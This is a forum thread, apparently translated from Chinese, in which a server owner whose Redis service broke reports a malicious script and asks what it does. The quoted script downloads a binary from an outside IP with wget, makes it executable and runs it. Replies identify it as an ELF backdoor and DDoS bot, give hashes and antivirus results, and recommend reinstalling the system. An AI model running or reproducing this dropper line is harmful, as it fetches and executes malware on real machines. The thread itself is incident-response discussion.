Today I found that a server redis could not connect, and found such an instruction on the server
#!/bin/bash
zfile="/tmp/z.TF"
if [ ! -f "$zfile" ]; then
wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi
The z.TF file is downloaded and executed. When z.TF is opened, it is all bytecode. This program can be automatically re-executed.
Currently, this program process is killed, but the redis service is still unavailable. I don’t know if there are other malicious programs left.
Could someone please explain the content of z.TF? And how to deal with it.
巴扎黑2017-06-07 09:26:08
z.TF is a Linux executable file in ELF format
Your server has a backdoor installed. Reinstall the system as soon as possible to fix the vulnerability.
Upgrade everything that needs to be upgraded.
It’s basically a backdoor + broiler
VirSCAN.org Scanned Report :
Scanned time : 2017-06-06 20:53:39
Scanner results: 10%的杀软(4/39)报告发现病毒
File Name : z.TF
File Size : 649640 byte
File Type : application/x-executable
MD5 : a6f42e73365ad56ce42985c5518d7e34
SHA1 : 564d6e2c2489a6d3a9d0634f76e065be7ad28072
Online report : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4
Scanner Engine Ver Sig Ver Sig Date Time Scan result
AVAST! 170303-1 4.7.4 2017-03-03 46 ELF:Ddostf-A
SOPHOS 5.32 3.65.2 2016-10-10 8 Linux/DDoS-BE
奇虎360 1.0.1 1.0.1 1.0.1 4 Win32/Backdoor.34d
江民杀毒 16.0.100 1.0.0.0 2017-06-05 2 Backdoor.Linux.wfg 某草草2017-06-07 09:26:08
By the way, please send me the code of t.ZF
Didn’t you explain the code you posted clearly?